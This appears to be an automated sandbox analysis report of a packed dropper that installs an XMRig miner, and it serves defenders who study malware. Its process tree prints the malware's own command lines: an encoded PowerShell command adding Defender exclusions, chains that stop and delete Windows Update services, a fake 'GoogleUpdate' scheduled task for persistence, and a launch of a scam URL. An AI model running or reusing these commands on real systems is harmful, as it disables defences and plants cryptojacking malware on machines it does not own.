Analysis

  • max time kernel
    300s
  • max time network
    263s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    28-06-2022 10:15

General

  • Target

    00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe

  • Size

    7.4MB

  • MD5

    360b1e11f8ab2a718f56a4fe23f9c846

  • SHA1

    4be3649ba2def716aa970e2b84b7e4b12215cf85

  • SHA256

    00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea

  • SHA512

    4b111c5116c8636e0d374abf83b489a4d04bb3eb71bd624051aaafeeb6f2cb41ae717fda875c51f558a957b811818729e51f32cfb391a8c5a99c23b3486c7795

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 13 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 46 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe
    "C:\Users\Admin\AppData\Local\Temp\00327fb13f368b775173b40d1a98c1ca73283d1c9e9b1b738725da6989e2faea.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1452
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:1360
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1616
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG4AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABhAHoAIwA+AA=="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1028
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAG4AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABhAHoAIwA+AA=="
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:820
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:648
          • C:\Windows\system32\powercfg.exe
            powercfg /x -hibernate-timeout-dc 0
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1996
          • C:\Windows\system32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:888
            • C:\Windows\system32\sc.exe
              sc stop wuauserv
              6⤵
              • Launches sc.exe
              PID:1772
            • C:\Windows\system32\sc.exe
              sc stop WaaSMedicSvc
              6⤵
              • Launches sc.exe
              PID:1608
            • C:\Windows\system32\icacls.exe
              icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:756
            • C:\Windows\system32\takeown.exe
              takeown /f C:\Windows\System32\WaaSMedicSvc.dll
              6⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:1688
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
              6⤵
              • Modifies registry key
              PID:1920
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
              6⤵
              • Modifies registry key
              PID:648
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
              6⤵
              • Modifies registry key
              PID:1840
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
              6⤵
              • Modifies registry key
              PID:1044
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
              6⤵
              • Modifies registry key
              PID:2000
            • C:\Windows\system32\sc.exe
              sc stop dosvc
              6⤵
              • Launches sc.exe
              PID:1264
            • C:\Windows\system32\sc.exe
              sc stop bits
              6⤵
              • Launches sc.exe
              PID:1688
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
              6⤵
              • Modifies registry key
              PID:1044
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
              6⤵
                PID:648
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                6⤵
                  PID:516
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                  6⤵
                    PID:1980
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                    6⤵
                      PID:792
                    • C:\Windows\system32\reg.exe
                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                      6⤵
                      • Modifies registry key
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1840
                    • C:\Windows\system32\reg.exe
                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                      6⤵
                      • Modifies registry key
                      PID:1108
                    • C:\Windows\system32\reg.exe
                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                      6⤵
                      • Modifies registry key
                      PID:1144
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      6⤵
                        PID:616
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                        6⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1688
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        6⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1616
                      • C:\Windows\system32\sc.exe
                        sc stop UsoSvc
                        6⤵
                        • Launches sc.exe
                        PID:1108
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -standby-timeout-ac 0
                      5⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1932
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -standby-timeout-dc 0
                      5⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1612
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1752
                    • C:\Windows\system32\sc.exe
                      sc stop UsoSvc
                      5⤵
                      • Launches sc.exe
                      PID:1264
                    • C:\Windows\system32\sc.exe
                      sc stop WaaSMedicSvc
                      5⤵
                      • Launches sc.exe
                      PID:1552
                    • C:\Windows\system32\sc.exe
                      sc stop wuauserv
                      5⤵
                      • Launches sc.exe
                      PID:972
                    • C:\Windows\system32\sc.exe
                      sc stop bits
                      5⤵
                      • Launches sc.exe
                      PID:1760
                    • C:\Windows\system32\sc.exe
                      sc stop dosvc
                      5⤵
                      • Launches sc.exe
                      PID:1636
                    • C:\Windows\system32\reg.exe
                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                      5⤵
                      • Modifies registry key
                      PID:364
                    • C:\Windows\system32\reg.exe
                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                      5⤵
                      • Modifies registry key
                      PID:1796
                    • C:\Windows\system32\reg.exe
                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                      5⤵
                      • Modifies security service
                      • Modifies registry key
                      PID:1668
                    • C:\Windows\system32\reg.exe
                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                      5⤵
                      • Modifies registry key
                      PID:1864
                    • C:\Windows\system32\reg.exe
                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                      5⤵
                      • Modifies registry key
                      PID:616
                    • C:\Windows\system32\takeown.exe
                      takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                      5⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      • Suspicious use of AdjustPrivilegeToken
                      PID:508
                    • C:\Windows\system32\icacls.exe
                      icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                      5⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      PID:268
                    • C:\Windows\system32\reg.exe
                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                      5⤵
                      • Modifies registry key
                      PID:1864
                    • C:\Windows\system32\reg.exe
                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                      5⤵
                      • Modifies registry key
                      PID:616
                    • C:\Windows\system32\reg.exe
                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                      5⤵
                      • Modifies registry key
                      PID:1920
                    • C:\Windows\system32\reg.exe
                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                      5⤵
                      • Modifies registry key
                      PID:1980
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                      5⤵
                        PID:1640
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                        5⤵
                          PID:1968
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                          5⤵
                            PID:1760
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                            5⤵
                              PID:1108
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                              5⤵
                                PID:820
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                5⤵
                                  PID:112
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                  5⤵
                                    PID:1072
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                                  4⤵
                                    PID:1796
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                                      5⤵
                                      • Creates scheduled task(s)
                                      PID:1952
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                    4⤵
                                      PID:1864
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                        5⤵
                                          PID:1232
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c ""C:\Windows\Temp\run.bat" "
                                    2⤵
                                    • Drops startup file
                                    PID:1824
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c ""C:\Windows\Temp\lol.bat" "
                                    2⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:792
                                    • C:\Program Files\Internet Explorer\iexplore.exe
                                      "C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
                                      3⤵
                                      • Modifies Internet Explorer settings
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SetWindowsHookEx
                                      • Suspicious use of WriteProcessMemory
                                      PID:1132
                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1132 CREDAT:275457 /prefetch:2
                                        4⤵
                                        • Modifies Internet Explorer settings
                                        • Suspicious use of SetWindowsHookEx
                                        PID:1488
                                • C:\Windows\system32\taskeng.exe
                                  taskeng.exe {BAB02AF0-587A-4D8C-A2AC-B3E6E65A3198} S-1-5-18:NT AUTHORITY\System:Service:
                                  1⤵
                                  • Loads dropped DLL
                                  PID:508
                                  • C:\Program Files\Chrome\updater.exe
                                    "C:\Program Files\Chrome\updater.exe"
                                    2⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Executes dropped EXE
                                    • Checks BIOS information in registry
                                    • Checks whether UAC is enabled
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:1028
                                    • C:\Windows\System32\conhost.exe
                                      "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                                      3⤵
                                      • Drops file in Drivers directory
                                      • Suspicious use of SetThreadContext
                                      • Drops file in Program Files directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:112
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG4AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABhAHoAIwA+AA=="
                                        4⤵
                                          PID:1796
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -EncodedCommand "PAAjAG4AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABhAHoAIwA+AA=="
                                            5⤵
                                              PID:1688
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                            4⤵
                                              PID:1560
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                              4⤵
                                                PID:888
                                              • C:\Windows\System32\conhost.exe
                                                C:\Windows\System32\conhost.exe
                                                4⤵
                                                  PID:1764
                                                  • C:\Windows\System32\conhost.exe
                                                    "C:\Windows\System32\conhost.exe" "lnftwwoznl"
                                                    5⤵
                                                      PID:1628
                                                  • C:\Windows\explorer.exe
                                                    C:\Windows\explorer.exe jfkojmuoois1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                    4⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1348
                                            • C:\Windows\system32\powercfg.exe
                                              powercfg /x -hibernate-timeout-ac 0
                                              1⤵
                                                PID:1840
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-dc 0
                                                1⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:808
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-ac 0
                                                1⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:824
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -hibernate-timeout-dc 0
                                                1⤵
                                                  PID:1616

                                                Network

                                                MITRE ATT&CK Matrix ATT&CK v6

                                                Execution

                                                Scheduled Task

                                                1
                                                T1053

                                                Persistence

                                                Modify Existing Service

                                                2
                                                T1031

                                                Scheduled Task

                                                1
                                                T1053

                                                Privilege Escalation

                                                Scheduled Task

                                                1
                                                T1053

                                                Defense Evasion

                                                Modify Registry

                                                3
                                                T1112

                                                Virtualization/Sandbox Evasion

                                                1
                                                T1497

                                                Impair Defenses

                                                1
                                                T1562

                                                File Permissions Modification

                                                1
                                                T1222

                                                Discovery

                                                Query Registry

                                                2
                                                T1012

                                                Virtualization/Sandbox Evasion

                                                1
                                                T1497

                                                System Information Discovery

                                                3
                                                T1082

                                                Impact

                                                Service Stop

                                                1
                                                T1489

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Program Files\Chrome\updater.exe
                                                  Filesize

                                                  7.2MB

                                                  MD5

                                                  34114ac92707af5ed0825e37be5e7fb0

                                                  SHA1

                                                  0b52506b481afbe89682f50285ad4c79b9ead2e3

                                                  SHA256

                                                  9082d70100ed1473306f6ee39fa96078bab56a11a92efee2c8ae1a75ef307e47

                                                  SHA512

                                                  44182a3ebfe68f2b1acc012fc89328b709ab64f896d3a875837dc97ca900e31d0180140ec77a7d194b0af94360b8b988bf706379ab26e6cada390a75a0588d0f

                                                • C:\Program Files\Chrome\updater.exe
                                                  Filesize

                                                  7.2MB

                                                  MD5

                                                  34114ac92707af5ed0825e37be5e7fb0

                                                  SHA1

                                                  0b52506b481afbe89682f50285ad4c79b9ead2e3

                                                  SHA256

                                                  9082d70100ed1473306f6ee39fa96078bab56a11a92efee2c8ae1a75ef307e47

                                                  SHA512

                                                  44182a3ebfe68f2b1acc012fc89328b709ab64f896d3a875837dc97ca900e31d0180140ec77a7d194b0af94360b8b988bf706379ab26e6cada390a75a0588d0f

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                  Filesize

                                                  60KB

                                                  MD5

                                                  308336e7f515478969b24c13ded11ede

                                                  SHA1

                                                  8fb0cf42b77dbbef224a1e5fc38abc2486320775

                                                  SHA256

                                                  889b832323726a9f10ad03f85562048fdcfe20c9ff6f9d37412cf477b4e92ff9

                                                  SHA512

                                                  61ad97228cd6c3909ef3ac5e4940199971f293bdd0d5eb7916e60469573a44b6287c0fa1e0b6c1389df35eb6c9a7d2a61fdb318d4a886a3821ef5a9dab3ac24f

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                  Filesize

                                                  342B

                                                  MD5

                                                  091941a491bc43f18dc08d0e60a8eb07

                                                  SHA1

                                                  1ede5c060b57eba1812d50c00cfc34b292306cca

                                                  SHA256

                                                  a9f7a99e3550606cc0b0de0050100fc5cd29f7f6440bfbffbf2faf7598cf67d8

                                                  SHA512

                                                  c1d204c21eb34009e2bc118c51ff6aa1cb2603a449b5cc284310836a25edf63a37f639e40745032eaae52df90886f5e50cb8f150bed9e820d92629f0bb90fdd0

                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\7Z1BLVWB.txt
                                                  Filesize

                                                  604B

                                                  MD5

                                                  2155d6c57bdada665cd0e3a001643b09

                                                  SHA1

                                                  646e07dd9fb6a65d8c314d77a66f489ba5037747

                                                  SHA256

                                                  cb3fb62a2787ed290380bc82dd65336d57f1d3cecc38b9f4f316a0f49a269462

                                                  SHA512

                                                  0ed2ac3d4996ce8690d27cbe0c6342d6b291f7db4ad17a7bb9a6d83fadfc16488697323ce899d5eb3de3a504e212387034fae9b65e946f0792e54ea170144972

                                                • C:\Windows\Temp\lol.bat
                                                  Filesize

                                                  59B

                                                  MD5

                                                  f580e0e80cc87b25e38ea2c0c8059d04

                                                  SHA1

                                                  299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                  SHA256

                                                  9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                  SHA512

                                                  5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                                • C:\Windows\Temp\run.bat
                                                  Filesize

                                                  98B

                                                  MD5

                                                  731afe244b2414169a5f630d52646e56

                                                  SHA1

                                                  e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                  SHA256

                                                  6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                  SHA512

                                                  84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                                • C:\Windows\Temp\setup.exe
                                                  Filesize

                                                  7.2MB

                                                  MD5

                                                  34114ac92707af5ed0825e37be5e7fb0

                                                  SHA1

                                                  0b52506b481afbe89682f50285ad4c79b9ead2e3

                                                  SHA256

                                                  9082d70100ed1473306f6ee39fa96078bab56a11a92efee2c8ae1a75ef307e47

                                                  SHA512

